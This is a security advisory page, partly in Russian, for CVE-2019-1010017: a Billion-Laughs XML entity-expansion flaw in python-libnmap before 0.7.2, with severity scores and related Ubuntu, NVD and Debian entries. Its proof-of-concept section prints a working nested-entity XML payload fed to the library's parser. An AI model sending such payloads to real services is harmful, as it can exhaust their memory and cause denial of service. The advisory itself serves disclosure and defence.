GHSA-9ccv-p7fg-m73x

Опубликовано: 18 июл. 2019

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

XML Injection in python-libnmap

Description

python-libnmap is affected by a Billion-Laughs -style XML injection vulnerability.

PoC

ty = NmapParser() payload = """ <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ]> <lolz><hello>&lol3;</hello></lolz> """ ty.parse(payload)

Ссылки

Пакеты

Наименование

python-libnmap

pip

Затронутые версииВерсия исправления

< 0.7.2

0.7.2

EPSS

Процентиль: 68%

0.00558

Низкий

7.5 High

CVSS3

CVE ID

CVE-2019-1010017

Дефекты

CWE-91

Связанные уязвимости

CVE-2019-1010017

CVSS3: 7.5

ubuntu

больше 6 лет назад

libnmap < v0.6.3 is affected by: XML Injection. The impact is: Denial of service (DoS) by consuming resources. The component is: XML Parsing. The attack vector is: Specially crafted XML payload.

CVE-2019-1010017

CVSS3: 7.5

nvd

больше 6 лет назад

libnmap < v0.6.3 is affected by: XML Injection. The impact is: Denial of service (DoS) by consuming resources. The component is: XML Parsing. The attack vector is: Specially crafted XML payload.

CVE-2019-1010017

CVSS3: 7.5

debian

больше 6 лет назад

libnmap < v0.6.3 is affected by: XML Injection. The impact is: Denial ...

EPSS

Процентиль: 68%

0.00558

Низкий

7.5 High

CVSS3

CVE ID

CVE-2019-1010017

Дефекты

CWE-91